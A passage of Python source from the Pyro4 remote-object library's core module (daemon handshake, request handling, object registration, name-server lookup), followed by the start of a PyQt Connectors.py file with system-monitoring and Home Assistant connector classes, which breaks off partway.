Return True for successful handshake, False if something was wrong.
If a denied_reason is given, the handshake will fail with the given reason.
"""
serializer_id = util.MarshalSerializer.serializer_id
msg_seq = 0
try:
msg = message.Message.recv(conn, [message.MSG_CONNECT], hmac_key=self._pyroHmacKey)
msg_seq = msg.seq
if denied_reason:
raise Exception(denied_reason)
if config.LOGWIRE:
_log_wiredata(log, "daemon handshake received", msg)
if msg.serializer_id not in self.__serializer_ids:
raise errors.SerializeError("message used serializer that is not accepted: %d" % msg.serializer_id)
if "CORR" in msg.annotations:
current_context.correlation_id = uuid.UUID(bytes=msg.annotations["CORR"])
else:
current_context.correlation_id = uuid.uuid4()
serializer_id = msg.serializer_id
serializer = util.get_serializer_by_id(serializer_id)
data = serializer.deserializeData(msg.data, msg.flags & message.FLAGS_COMPRESSED)
handshake_response = self.validateHandshake(conn, data["handshake"])
if msg.flags & message.FLAGS_META_ON_CONNECT:
# Usually this flag will be enabled, which results in including the object metadata
# in the handshake response. This avoids a separate remote call to get_metadata.
flags = message.FLAGS_META_ON_CONNECT
handshake_response = {
"handshake": handshake_response,
"meta": self.objectsById[constants.DAEMON_NAME].get_metadata(data["object"], as_lists=True)
}
else:
flags = 0
data, compressed = serializer.serializeData(handshake_response, config.COMPRESSION)
msgtype = message.MSG_CONNECTOK
if compressed:
flags |= message.FLAGS_COMPRESSED
except errors.ConnectionClosedError:
log.debug("handshake failed, connection closed early")
return False
except Exception as x:
log.debug("handshake failed, reason:", exc_info=True)
serializer = util.get_serializer_by_id(serializer_id)
data, compressed = serializer.serializeData(str(x), False)
msgtype = message.MSG_CONNECTFAIL
flags = message.FLAGS_COMPRESSED if compressed else 0
# We need a minimal amount of response data or the socket will remain blocked
# on some systems... (messages smaller than 40 bytes)
msg = message.Message(msgtype, data, serializer_id, flags, msg_seq, annotations=self.__annotations(), hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "daemon handshake response", msg)
conn.send(msg.to_bytes())
return msg.type == message.MSG_CONNECTOK
def validateHandshake(self, conn, data):
"""
Override this to create a connection validator for new client connections.
It should return a response data object normally if the connection is okay,
or should raise an exception if the connection should be denied.
"""
return "hello"
def clientDisconnect(self, conn):
"""
Override this to handle a client disconnect.
Conn is the SocketConnection object that was disconnected.
"""
pass
def handleRequest(self, conn):
"""
Handle incoming Pyro request. Catches any exception that may occur and
        wraps it in a reply to the calling side, so as not to make this server-side loop
terminate due to exceptions caused by remote invocations.
"""
request_flags = 0
request_seq = 0
request_serializer_id = util.MarshalSerializer.serializer_id
wasBatched = False
isCallback = False
try:
msg = message.Message.recv(conn, [message.MSG_INVOKE, message.MSG_PING], hmac_key=self._pyroHmacKey)
except errors.CommunicationError as x:
# we couldn't even get data from the client, this is an immediate error
# log.info("error receiving data from client %s: %s", conn.sock.getpeername(), x)
raise x
try:
request_flags = msg.flags
request_seq = msg.seq
request_serializer_id = msg.serializer_id
current_context.correlation_id = uuid.UUID(bytes=msg.annotations["CORR"]) if "CORR" in msg.annotations else uuid.uuid4()
if config.LOGWIRE:
_log_wiredata(log, "daemon wiredata received", msg)
if msg.type == message.MSG_PING:
# return same seq, but ignore any data (it's a ping, not an echo). Nothing is deserialized.
msg = message.Message(message.MSG_PING, b"pong", msg.serializer_id, 0, msg.seq,
annotations=self.__annotations(), hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "daemon wiredata sending", msg)
conn.send(msg.to_bytes())
return
if msg.serializer_id not in self.__serializer_ids:
raise errors.SerializeError("message used serializer that is not accepted: %d" % msg.serializer_id)
serializer = util.get_serializer_by_id(msg.serializer_id)
if request_flags & message.FLAGS_KEEPSERIALIZED:
# pass on the wire protocol message blob unchanged
objId, method, vargs, kwargs = self.__deserializeBlobArgs(msg)
else:
# normal deserialization of remote call arguments
objId, method, vargs, kwargs = serializer.deserializeCall(msg.data, compressed=msg.flags & message.FLAGS_COMPRESSED)
current_context.client = conn
try:
current_context.client_sock_addr = conn.sock.getpeername() # store, because on oneway calls, socket will be disconnected
except socket.error:
current_context.client_sock_addr = None # sometimes getpeername() doesn't work...
current_context.seq = msg.seq
current_context.annotations = msg.annotations
current_context.msg_flags = msg.flags
current_context.serializer_id = msg.serializer_id
del msg # invite GC to collect the object, don't wait for out-of-scope
obj = self.objectsById.get(objId)
if obj is not None:
if inspect.isclass(obj):
obj = self._getInstance(obj, conn)
if request_flags & message.FLAGS_BATCH:
# batched method calls, loop over them all and collect all results
data = []
for method, vargs, kwargs in vargs:
method = util.getAttribute(obj, method)
try:
result = method(*vargs, **kwargs) # this is the actual method call to the Pyro object
except Exception:
xt, xv = sys.exc_info()[0:2]
log.debug("Exception occurred while handling batched request: %s", xv)
xv._pyroTraceback = util.formatTraceback(detailed=config.DETAILED_TRACEBACK)
if sys.platform == "cli":
util.fixIronPythonExceptionForPickle(xv, True) # piggyback attributes
data.append(futures._ExceptionWrapper(xv))
break # stop processing the rest of the batch
else:
data.append(result) # note that we don't support streaming results in batch mode
wasBatched = True
else:
# normal single method call
if method == "__getattr__":
# special case for direct attribute access (only exposed @properties are accessible)
data = util.get_exposed_property_value(obj, vargs[0], only_exposed=config.REQUIRE_EXPOSE)
elif method == "__setattr__":
# special case for direct attribute access (only exposed @properties are accessible)
data = util.set_exposed_property_value(obj, vargs[0], vargs[1], only_exposed=config.REQUIRE_EXPOSE)
else:
method = util.getAttribute(obj, method)
if request_flags & message.FLAGS_ONEWAY and config.ONEWAY_THREADED:
# oneway call to be run inside its own thread
_OnewayCallThread(target=method, args=vargs, kwargs=kwargs).start()
else:
isCallback = getattr(method, "_pyroCallback", False)
data = method(*vargs, **kwargs) # this is the actual method call to the Pyro object
if not request_flags & message.FLAGS_ONEWAY:
isStream, data = self._streamResponse(data, conn)
if isStream:
# throw an exception as well as setting message flags
# this way, it is backwards compatible with older pyro versions.
exc = errors.ProtocolError("result of call is an iterator")
ann = {"STRM": data.encode()} if data else {}
self._sendExceptionResponse(conn, request_seq, serializer.serializer_id, exc, None,
annotations=ann, flags=message.FLAGS_ITEMSTREAMRESULT)
return
else:
log.debug("unknown object requested: %s", objId)
raise errors.DaemonError("unknown object")
if request_flags & message.FLAGS_ONEWAY:
return # oneway call, don't send a response
else:
data, compressed = serializer.serializeData(data, compress=config.COMPRESSION)
response_flags = 0
if compressed:
response_flags |= message.FLAGS_COMPRESSED
if wasBatched:
response_flags |= message.FLAGS_BATCH
msg = message.Message(message.MSG_RESULT, data, serializer.serializer_id, response_flags, request_seq,
annotations=self.__annotations(), hmac_key=self._pyroHmacKey)
current_context.response_annotations = {}
if config.LOGWIRE:
_log_wiredata(log, "daemon wiredata sending", msg)
conn.send(msg.to_bytes())
except Exception:
xt, xv = sys.exc_info()[0:2]
msg = getattr(xv, "pyroMsg", None)
if msg:
request_seq = msg.seq
request_serializer_id = msg.serializer_id
if xt is not errors.ConnectionClosedError:
if xt not in (StopIteration, GeneratorExit):
log.debug("Exception occurred while handling request: %r", xv)
if not request_flags & message.FLAGS_ONEWAY:
if isinstance(xv, errors.SerializeError) or not isinstance(xv, errors.CommunicationError):
# only return the error to the client if it wasn't a oneway call, and not a communication error
# (in these cases, it makes no sense to try to report the error back to the client...)
tblines = util.formatTraceback(detailed=config.DETAILED_TRACEBACK)
self._sendExceptionResponse(conn, request_seq, request_serializer_id, xv, tblines)
if isCallback or isinstance(xv, (errors.CommunicationError, errors.SecurityError)):
raise # re-raise if flagged as callback, communication or security error.
def _clientDisconnect(self, conn):
if config.ITER_STREAM_LINGER > 0:
# client goes away, keep streams around for a bit longer (allow reconnect)
for streamId in list(self.streaming_responses):
info = self.streaming_responses.get(streamId, None)
if info and info[0] is conn:
_, timestamp, _, stream = info
self.streaming_responses[streamId] = (None, timestamp, time.time(), stream)
else:
# client goes away, close any streams it had open as well
for streamId in list(self.streaming_responses):
info = self.streaming_responses.get(streamId, None)
if info and info[0] is conn:
del self.streaming_responses[streamId]
self.clientDisconnect(conn) # user overridable hook
def _housekeeping(self):
"""
Perform periodical housekeeping actions (cleanups etc)
"""
if self._shutting_down:
return
with self.housekeeper_lock:
if self.streaming_responses:
if config.ITER_STREAM_LIFETIME > 0:
# cleanup iter streams that are past their lifetime
for streamId in list(self.streaming_responses.keys()):
info = self.streaming_responses.get(streamId, None)
if info:
last_use_period = time.time() - info[1]
if 0 < config.ITER_STREAM_LIFETIME < last_use_period:
del self.streaming_responses[streamId]
if config.ITER_STREAM_LINGER > 0:
# cleanup iter streams that are past their linger time
for streamId in list(self.streaming_responses.keys()):
info = self.streaming_responses.get(streamId, None)
if info and info[2]:
linger_period = time.time() - info[2]
if linger_period > config.ITER_STREAM_LINGER:
del self.streaming_responses[streamId]
self.housekeeping()
def housekeeping(self):
"""
Override this to add custom periodic housekeeping (cleanup) logic.
This will be called every few seconds by the running daemon's request loop.
"""
pass
def _getInstance(self, clazz, conn):
"""
Find or create a new instance of the class
"""
def createInstance(clazz, creator):
try:
if creator:
obj = creator(clazz)
if isinstance(obj, clazz):
return obj
raise TypeError("instance creator returned object of different type")
return clazz()
except Exception:
log.exception("could not create pyro object instance")
raise
instance_mode, instance_creator = clazz._pyroInstancing
if instance_mode == "single":
# create and use one singleton instance of this class (not a global singleton, just exactly one per daemon)
with self.create_single_instance_lock:
instance = self._pyroInstances.get(clazz)
if not instance:
log.debug("instancemode %s: creating new pyro object for %s", instance_mode, clazz)
instance = createInstance(clazz, instance_creator)
self._pyroInstances[clazz] = instance
return instance
elif instance_mode == "session":
# Create and use one instance for this proxy connection
# the instances are kept on the connection object.
# (this is the default instance mode when using new style @expose)
instance = conn.pyroInstances.get(clazz)
if not instance:
log.debug("instancemode %s: creating new pyro object for %s", instance_mode, clazz)
instance = createInstance(clazz, instance_creator)
conn.pyroInstances[clazz] = instance
return instance
elif instance_mode == "percall":
# create and use a new instance just for this call
log.debug("instancemode %s: creating new pyro object for %s", instance_mode, clazz)
return createInstance(clazz, instance_creator)
else:
raise errors.DaemonError("invalid instancemode in registered class")
def _sendExceptionResponse(self, connection, seq, serializer_id, exc_value, tbinfo, flags=0, annotations=None):
"""send an exception back including the local traceback info"""
exc_value._pyroTraceback = tbinfo
if sys.platform == "cli":
util.fixIronPythonExceptionForPickle(exc_value, True) # piggyback attributes
serializer = util.get_serializer_by_id(serializer_id)
try:
data, compressed = serializer.serializeData(exc_value)
except:
# the exception object couldn't be serialized, use a generic PyroError instead
xt, xv, tb = sys.exc_info()
msg = "Error serializing exception: %s. Original exception: %s: %s" % (str(xv), type(exc_value), str(exc_value))
exc_value = errors.PyroError(msg)
exc_value._pyroTraceback = tbinfo
if sys.platform == "cli":
util.fixIronPythonExceptionForPickle(exc_value, True) # piggyback attributes
data, compressed = serializer.serializeData(exc_value)
flags |= message.FLAGS_EXCEPTION
if compressed:
flags |= message.FLAGS_COMPRESSED
annotations = dict(annotations or {})
annotations.update(self.annotations())
msg = message.Message(message.MSG_RESULT, data, serializer.serializer_id, flags, seq,
annotations=annotations, hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "daemon wiredata sending (error response)", msg)
connection.send(msg.to_bytes())
def register(self, obj_or_class, objectId=None, force=False):
"""
Register a Pyro object under the given id. Note that this object is now only
known inside this daemon, it is not automatically available in a name server.
This method returns a URI for the registered object.
Pyro checks if an object is already registered, unless you set force=True.
You can register a class or an object (instance) directly.
For a class, Pyro will create instances of it to handle the remote calls according
to the instance_mode (set via @expose on the class). The default there is one object
per session (=proxy connection). If you register an object directly, Pyro will use
that single object for *all* remote calls.
"""
if objectId:
if not isinstance(objectId, basestring):
raise TypeError("objectId must be a string or None")
else:
objectId = "obj_" + uuid.uuid4().hex # generate a new objectId
if inspect.isclass(obj_or_class):
if not hasattr(obj_or_class, "_pyroInstancing"):
obj_or_class._pyroInstancing = ("session", None)
if not force:
if hasattr(obj_or_class, "_pyroId") and obj_or_class._pyroId != "": # check for empty string is needed for Cython
raise errors.DaemonError("object or class already has a Pyro id")
if objectId in self.objectsById:
raise errors.DaemonError("an object or class is already registered with that id")
# set some pyro attributes
obj_or_class._pyroId = objectId
obj_or_class._pyroDaemon = self
if config.AUTOPROXY:
# register a custom serializer for the type to automatically return proxies
# we need to do this for all known serializers
for ser in util._serializers.values():
if inspect.isclass(obj_or_class):
ser.register_type_replacement(obj_or_class, pyroObjectToAutoProxy)
else:
ser.register_type_replacement(type(obj_or_class), pyroObjectToAutoProxy)
# register the object/class in the mapping
self.objectsById[obj_or_class._pyroId] = obj_or_class
return self.uriFor(objectId)
def unregister(self, objectOrId):
"""
Remove a class or object from the known objects inside this daemon.
You can unregister the class/object directly, or with its id.
"""
if objectOrId is None:
raise ValueError("object or objectid argument expected")
if not isinstance(objectOrId, basestring):
objectId = getattr(objectOrId, "_pyroId", None)
if objectId is None:
raise errors.DaemonError("object isn't registered")
else:
objectId = objectOrId
objectOrId = None
if objectId == constants.DAEMON_NAME:
return
if objectId in self.objectsById:
del self.objectsById[objectId]
if objectOrId is not None:
del objectOrId._pyroId
del objectOrId._pyroDaemon
# Don't remove the custom type serializer because there may be
# other registered objects of the same type still depending on it.
def uriFor(self, objectOrId, nat=True):
"""
Get a URI for the given object (or object id) from this daemon.
Only a daemon can hand out proper uris because the access location is
contained in them.
        Note that unregistered objects cannot be given a URI, but unregistered
        object names can (it's just a string we're creating in that case).
        If nat is set to False, the configured NAT address (if any) is ignored and it will
        return a URI for the internal address.
"""
if not isinstance(objectOrId, basestring):
objectOrId = getattr(objectOrId, "_pyroId", None)
if objectOrId is None or objectOrId not in self.objectsById:
raise errors.DaemonError("object isn't registered in this daemon")
if nat:
loc = self.natLocationStr or self.locationStr
else:
loc = self.locationStr
return URI("PYRO:%s@%s" % (objectOrId, loc))
def resetMetadataCache(self, objectOrId, nat=True):
"""Reset cache of metadata when a Daemon has available methods/attributes
dynamically updated. Clients will have to get a new proxy to see changes"""
uri = self.uriFor(objectOrId, nat)
# can only be cached if registered, else no-op
if uri.object in self.objectsById:
registered_object = self.objectsById[uri.object]
# Clear cache regardless of how it is accessed
util.reset_exposed_members(registered_object, config.REQUIRE_EXPOSE, as_lists=True)
util.reset_exposed_members(registered_object, config.REQUIRE_EXPOSE, as_lists=False)
def proxyFor(self, objectOrId, nat=True):
"""
Get a fully initialized Pyro Proxy for the given object (or object id) for this daemon.
If nat is False, the configured NAT address (if any) is ignored.
The object or id must be registered in this daemon, or you'll get an exception.
(you can't get a proxy for an unknown object)
"""
uri = self.uriFor(objectOrId, nat)
proxy = Proxy(uri)
try:
registered_object = self.objectsById[uri.object]
except KeyError:
raise errors.DaemonError("object isn't registered in this daemon")
meta = util.get_exposed_members(registered_object, only_exposed=config.REQUIRE_EXPOSE)
proxy._pyroGetMetadata(known_metadata=meta)
return proxy
def close(self):
"""Close down the server and release resources"""
self.__mustshutdown.set()
self.streaming_responses = {}
if self.transportServer:
log.debug("daemon closing")
self.transportServer.close()
self.transportServer = None
def annotations(self):
"""Override to return a dict with custom user annotations to be sent with each response message."""
return {}
def combine(self, daemon):
"""
        Combines the event loop of the other daemon into the current daemon's loop.
You can then simply run the current daemon's requestLoop to serve both daemons.
This works fine on the multiplex server type, but doesn't work with the threaded server type.
"""
log.debug("combining event loop with other daemon")
self.transportServer.combine_loop(daemon.transportServer)
def __annotations(self):
annotations = current_context.response_annotations
if current_context.correlation_id:
annotations["CORR"] = current_context.correlation_id.bytes
else:
annotations.pop("CORR", None)
annotations.update(self.annotations())
return annotations
def __repr__(self):
if hasattr(self, "locationStr"):
family = socketutil.family_str(self.sock)
return "<%s.%s at 0x%x; %s - %s; %d objects>" % (self.__class__.__module__, self.__class__.__name__,
id(self), self.locationStr, family, len(self.objectsById))
else:
# daemon objects may come back from serialized form without being properly initialized (by design)
return "<%s.%s at 0x%x; unusable>" % (self.__class__.__module__, self.__class__.__name__, id(self))
def __enter__(self):
if not self.transportServer:
raise errors.PyroError("cannot reuse this object")
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def __getstate__(self):
# A little hack to make it possible to serialize Pyro objects, because they can reference a daemon,
# but it is not meant to be able to properly serialize/deserialize Daemon objects.
return {}
def __getstate_for_dict__(self):
return tuple(self.__getstate__())
def __setstate_from_dict__(self, state):
pass
if sys.version_info < (3, 0):
__lazy_dict_iterator_types = (type({}.iterkeys()), type({}.itervalues()), type({}.iteritems()))
else:
__lazy_dict_iterator_types = (type({}.keys()), type({}.values()), type({}.items()))
def _streamResponse(self, data, client):
if sys.version_info < (3, 4):
from collections import Iterator
else:
from collections.abc import Iterator
if isinstance(data, Iterator) or inspect.isgenerator(data):
if config.ITER_STREAMING:
if type(data) in self.__lazy_dict_iterator_types:
raise errors.PyroError("won't serialize or stream lazy dict iterators, convert to list yourself")
stream_id = str(uuid.uuid4())
self.streaming_responses[stream_id] = (client, time.time(), 0, data)
return True, stream_id
return True, None
return False, data
def __deserializeBlobArgs(self, protocolmsg):
import marshal
blobinfo = protocolmsg.annotations["BLBI"]
if sys.platform == "cli" and type(blobinfo) is not str:
# Ironpython's marshal expects str...
blobinfo = str(blobinfo)
blobinfo, objId, method = marshal.loads(blobinfo)
blob = SerializedBlob(blobinfo, protocolmsg, is_blob=True)
return objId, method, (blob,), {} # object, method, vargs, kwargs
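# --- Illustrative sketch (not part of the original module) ---
# Minimal server-side use of the Daemon defined above: register an object,
# optionally publish it in the name server, then serve requests. The service
# class and the registered name are illustrative assumptions; the name server
# lookup requires a running name server.
def _example_daemon_usage():
    @expose
    class EchoService(object):
        def echo(self, text):
            return text

    daemon = Daemon(host="localhost")           # port=0: the OS picks a free port
    uri = daemon.register(EchoService, "example.echo")
    with _locateNS() as ns:
        ns.register("example.echo", uri)
    print("serving", uri)
    daemon.requestLoop()                        # blocks, dispatching remote calls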
# serpent serializer initialization
try:
import serpent
def pyro_class_serpent_serializer(obj, serializer, stream, level):
# Override the default way that a Pyro URI/proxy/daemon is serialized.
# Because it defines a __getstate__ it would otherwise just become a tuple,
# and not be deserialized as a class.
d = util.SerializerBase.class_to_dict(obj)
serializer.ser_builtins_dict(d, stream, level)
# register the special serializers for the pyro objects with Serpent
serpent.register_class(URI, pyro_class_serpent_serializer)
serpent.register_class(Proxy, pyro_class_serpent_serializer)
serpent.register_class(Daemon, pyro_class_serpent_serializer)
serpent.register_class(futures._ExceptionWrapper, pyro_class_serpent_serializer)
except ImportError:
pass
def serialize_core_object_to_dict(obj):
return {
"__class__": "Pyro4.core." + obj.__class__.__name__,
"state": obj.__getstate_for_dict__()
}
util.SerializerBase.register_class_to_dict(URI, serialize_core_object_to_dict, serpent_too=False)
util.SerializerBase.register_class_to_dict(Proxy, serialize_core_object_to_dict, serpent_too=False)
util.SerializerBase.register_class_to_dict(Daemon, serialize_core_object_to_dict, serpent_too=False)
util.SerializerBase.register_class_to_dict(futures._ExceptionWrapper, futures._ExceptionWrapper.__serialized_dict__, serpent_too=False)
def _log_wiredata(logger, text, msg):
"""logs all the given properties of the wire message in the given logger"""
corr = str(uuid.UUID(bytes=msg.annotations["CORR"])) if "CORR" in msg.annotations else "?"
logger.debug("%s: msgtype=%d flags=0x%x ser=%d seq=%d corr=%s\nannotations=%r\ndata=%r" %
(text, msg.type, msg.flags, msg.serializer_id, msg.seq, corr, msg.annotations, msg.data))
class _CallContext(threading.local):
def __init__(self):
# per-thread initialization
self.client = None
self.client_sock_addr = None
self.seq = 0
self.msg_flags = 0
self.serializer_id = 0
self.annotations = {}
self.response_annotations = {}
self.correlation_id = None
def to_global(self):
if sys.platform != "cli":
return dict(self.__dict__)
# ironpython somehow has problems getting at the values, so do it manually:
return {
"client": self.client,
"seq": self.seq,
"msg_flags": self.msg_flags,
"serializer_id": self.serializer_id,
"annotations": self.annotations,
"response_annotations": self.response_annotations,
"correlation_id": self.correlation_id,
"client_sock_addr": self.client_sock_addr
}
def from_global(self, values):
self.client = values["client"]
self.seq = values["seq"]
self.msg_flags = values["msg_flags"]
self.serializer_id = values["serializer_id"]
self.annotations = values["annotations"]
self.response_annotations = values["response_annotations"]
self.correlation_id = values["correlation_id"]
self.client_sock_addr = values["client_sock_addr"]
def track_resource(self, resource):
"""keep a weak reference to the resource to be tracked for this connection"""
if self.client:
self.client.tracked_resources.add(resource)
else:
raise errors.PyroError("cannot track resource on a connectionless call")
def untrack_resource(self, resource):
"""no longer track the resource for this connection"""
if self.client:
self.client.tracked_resources.discard(resource)
else:
raise errors.PyroError("cannot untrack resource on a connectionless call")
class _OnewayCallThread(threading.Thread):
def __init__(self, target, args, kwargs):
super(_OnewayCallThread, self).__init__(target=target, args=args, kwargs=kwargs, name="oneway-call")
self.daemon = True
self.parent_context = current_context.to_global()
def run(self):
current_context.from_global(self.parent_context)
super(_OnewayCallThread, self).run()
# name server utility function, here to avoid cyclic dependencies
def _resolve(uri, hmac_key=None):
"""
Resolve a 'magic' uri (PYRONAME, PYROMETA) into the direct PYRO uri.
    It finds a name server, and uses that to resolve a PYRONAME uri into the direct PYRO uri pointing to the named object.
If uri is already a PYRO uri, it is returned unmodified.
You can consider this a shortcut function so that you don't have to locate and use a name server proxy yourself.
Note: if you need to resolve more than a few names, consider using the name server directly instead of repeatedly
calling this function, to avoid the name server lookup overhead from each call.
"""
if isinstance(uri, basestring):
uri = URI(uri)
elif not isinstance(uri, URI):
raise TypeError("can only resolve Pyro URIs")
if uri.protocol == "PYRO":
return uri
log.debug("resolving %s", uri)
if uri.protocol == "PYRONAME":
with _locateNS(uri.host, uri.port, hmac_key=hmac_key) as nameserver:
return nameserver.lookup(uri.object)
elif uri.protocol == "PYROMETA":
with _locateNS(uri.host, uri.port, hmac_key=hmac_key) as nameserver:
candidates = nameserver.list(metadata_all=uri.object)
if candidates:
candidate = random.choice(list(candidates.values()))
log.debug("resolved to candidate %s", candidate)
return URI(candidate)
raise errors.NamingError("no registrations available with desired metadata properties %s" % uri.object)
else:
raise errors.PyroError("invalid uri protocol")
# name server utility function, here to avoid cyclic dependencies
def _locateNS(host=None, port=None, broadcast=True, hmac_key=None):
"""Get a proxy for a name server somewhere in the network."""
if host is None:
# first try localhost if we have a good chance of finding it there
if config.NS_HOST in ("localhost", "::1") or config.NS_HOST.startswith("127."):
if ":" in config.NS_HOST: # ipv6
hosts = ["[%s]" % config.NS_HOST]
else:
# Some systems (Debian Linux) have 127.0.1.1 in the hosts file assigned to the hostname,
# try this too for convenience sake (only if it's actually used as a valid ip address)
try:
socket.gethostbyaddr("127.0.1.1")
hosts = [config.NS_HOST] if config.NS_HOST == "127.0.1.1" else [config.NS_HOST, "127.0.1.1"]
except socket.error:
hosts = [config.NS_HOST]
for host in hosts:
uristring = "PYRO:%s@%s:%d" % (constants.NAMESERVER_NAME, host, port or config.NS_PORT)
log.debug("locating the NS: %s", uristring)
proxy = Proxy(uristring)
proxy._pyroHmacKey = hmac_key
try:
proxy._pyroBind()
log.debug("located NS")
return proxy
except errors.PyroError:
pass
if config.PREFER_IP_VERSION == 6:
broadcast = False # ipv6 doesn't have broadcast. We should probably use multicast....
if broadcast:
# broadcast lookup
if not port:
port = config.NS_BCPORT
log.debug("broadcast locate")
sock = socketutil.createBroadcastSocket(reuseaddr=config.SOCK_REUSE, timeout=0.7)
for _ in range(3):
try:
for bcaddr in config.parseAddressesString(config.BROADCAST_ADDRS):
try:
sock.sendto(b"GET_NSURI", 0, (bcaddr, port))
except socket.error as x:
err = getattr(x, "errno", x.args[0])
# handle some errno's that some platforms like to throw:
if err not in socketutil.ERRNO_EADDRNOTAVAIL and err not in socketutil.ERRNO_EADDRINUSE:
raise
data, _ = sock.recvfrom(100)
sock.close()
if sys.version_info >= (3, 0):
data = data.decode("iso-8859-1")
log.debug("located NS: %s", data)
proxy = Proxy(data)
proxy._pyroHmacKey = hmac_key
return proxy
except socket.timeout:
continue
try:
sock.shutdown(socket.SHUT_RDWR)
except (OSError, socket.error):
pass
sock.close()
log.debug("broadcast locate failed, try direct connection on NS_HOST")
else:
log.debug("skipping broadcast lookup")
# broadcast failed or skipped, try PYRO directly on specific host
host = config.NS_HOST
port = config.NS_PORT
# pyro direct lookup
if not port:
port = config.NS_PORT
if URI.isUnixsockLocation(host):
uristring = "PYRO:%s@%s" % (constants.NAMESERVER_NAME, host)
else:
# if not a unix socket, check for ipv6
if ":" in host:
host = "[%s]" % host
uristring = "PYRO:%s@%s:%d" % (constants.NAMESERVER_NAME, host, port)
uri = URI(uristring)
log.debug("locating the NS: %s", uri)
proxy = Proxy(uri)
proxy._pyroHmacKey = hmac_key
try:
proxy._pyroBind()
log.debug("located NS")
return proxy
except errors.PyroError as x:
e = errors.NamingError("Failed to locate the nameserver")
if sys.version_info >= (3, 0):
e.__cause__ = x
raise e
class SerializedBlob(object):
"""
Used to wrap some data to make Pyro pass this object transparently (it keeps the serialized payload as-is)
    Only when you need to access the actual client data do you deserialize it, on demand.
This makes efficient, transparent gateways or dispatchers and such possible:
they don't have to de/reserialize the message and are independent from the serialized class definitions.
You have to pass this as the only parameter to a remote method call for Pyro to understand it.
Init arguments:
``info`` = some (small) descriptive data about the blob. Can be a simple id or name or guid. Must be marshallable.
``data`` = the actual client data payload that you want to transfer in the blob. Can be anything that you would
otherwise have used as regular remote call arguments.
"""
def __init__(self, info, data, is_blob=False):
self.info = info
self._data = data
self._contains_blob = is_blob
def deserialized(self):
"""Retrieves the client data stored in this blob. Deserializes the data automatically if required."""
if self._contains_blob:
protocol_msg = self._data
serializer = util.get_serializer_by_id(protocol_msg.serializer_id)
_, _, data, _ = serializer.deserializeData(protocol_msg.data, protocol_msg.flags & message.FLAGS_COMPRESSED)
return data
else:
return self._data
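# --- Illustrative sketch (not part of the original module) ---
# A gateway can accept a SerializedBlob and forward it without deserializing
# the payload, as described in the docstring above. A client would call it as
# gateway.process(SerializedBlob("some-id", payload)). The gateway class and
# the worker URI are illustrative assumptions.
def _example_blob_gateway():
    @expose
    class Gateway(object):
        def process(self, blob):
            # 'blob' arrives still serialized (FLAGS_KEEPSERIALIZED);
            # pass it through untouched to the real worker daemon
            with Proxy("PYRO:example.worker@localhost:9091") as worker:
                worker.process(blob)

    return Gateway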
# call context thread local
current_context = _CallContext()
"""the context object for the current call. (thread-local)"""
# 'async' keyword backwards compatibility for Python versions older than 3.7. New code should not use this!
if sys.version_info < (3, 7):
def asyncproxy(proxy, asynchronous=True, **kwargs):
"""convenience method to set proxy to asynchronous or sync mode."""
if kwargs:
kword = list(kwargs.keys())
if kword != ["async"]:
raise TypeError("asyncproxy() got an unexpected keyword argument '{:s}'".format(kword[0]))
asynchronous = kwargs["async"]
proxy._pyroAsync(asynchronous)
current_module = sys.modules[__name__]
pyro4_module = __import__("Pyro4")
current_module.__dict__["async"] = pyro4_module.__dict__["async"] = asyncproxy
Connectors.py
import logging
import time
import psutil
import socket
import websocket
import ssl
import simplejson as json
from threading import Thread
from enum import Enum
from PyQt5.QtGui import QGuiApplication
from PyQt5.QtCore import QDateTime, QObject, pyqtSignal, pyqtProperty, pyqtSlot
class LocalConnector(QObject):
dateTimeChanged = pyqtSignal(QDateTime)
cpuUsageChanged = pyqtSignal(int)
memUsageChanged = pyqtSignal(int)
memTotalChanged = pyqtSignal(int)
memFreeChanged = pyqtSignal(int)
hostnameChanged = pyqtSignal(str)
def __init__(self):
QObject.__init__(self)
self._dateTime = QDateTime()
self._cpuUsage = 0
self._memUsage = 0
self._memTotal = 0
self._memFree = 0
self._hostname = ""
def startUpdateLoop(self):
self.updateThread = Thread(target=self._updateLoop, daemon=True)
self.updateThread.start()
def _updateLoop(self):
while True:
self.dateTime = QDateTime.currentDateTime()
self.cpuUsage = psutil.cpu_percent()
self.hostname = socket.gethostname()
memInfo = psutil.virtual_memory()
self.memUsage = memInfo.percent
self.memTotal = memInfo.total
self.memFree = memInfo.available
time.sleep(0.5)
@pyqtProperty(QDateTime, notify=dateTimeChanged)
def dateTime(self):
return self._dateTime
@dateTime.setter
def dateTime(self, value):
self._dateTime = value
self.dateTimeChanged.emit(value)
@pyqtProperty(int, notify=cpuUsageChanged)
def cpuUsage(self):
return self._cpuUsage
@cpuUsage.setter
def cpuUsage(self, value):
if self._cpuUsage == value: return
self._cpuUsage = value
self.cpuUsageChanged.emit(value)
@pyqtProperty(int, notify=memUsageChanged)
def memUsage(self):
return self._memUsage
@memUsage.setter
def memUsage(self, value):
if self._memUsage == value: return
self._memUsage = value
self.memUsageChanged.emit(value)
@pyqtProperty(int, notify=memTotalChanged)
def memTotal(self):
return self._memTotal
@memTotal.setter
def memTotal(self, value):
if self._memTotal == value: return
self._memTotal = value
self.memTotalChanged.emit(value)
@pyqtProperty(int, notify=memFreeChanged)
def memFree(self):
return self._memFree
@memFree.setter
def memFree(self, value):
if self._memFree == value: return
self._memFree = value
self.memFreeChanged.emit(value)
@pyqtProperty(str, notify=hostnameChanged)
def hostname(self):
return self._hostname
@hostname.setter
def hostname(self, value):
if self._hostname == value: return
self._hostname = value
self.hostnameChanged.emit(value)
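# Minimal usage sketch (added for illustration; not part of the original module).
# Nothing below runs automatically; call _local_connector_demo() yourself to try it.
def _local_connector_demo(seconds=2):
    """Start the update loop and print a few samples of the exposed properties."""
    local = LocalConnector()
    local.startUpdateLoop()  # daemon thread refreshes the values every 0.5s
    for _ in range(int(seconds / 0.5)):
        time.sleep(0.5)
        print(local.hostname, local.cpuUsage, local.memUsage)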
class HomeAssistantConnector(QObject):
entitiesChanged = pyqtSignal(dict)
def __init__(self, host, port, accessToken, useSSL):
QObject.__init__(self)
self._host = host
self._port = port
self._accessToken = accessToken
self._useSSL = useSSL
self._logger = logging.getLogger("hass")
self._msgId = 0
self._requestCurrentStateMsgId = 0
self._autoReconnectIntervalInSecs = 5
self._entities = {}
def connect(self):
proto = "wss" if self._useSSL else "ws"
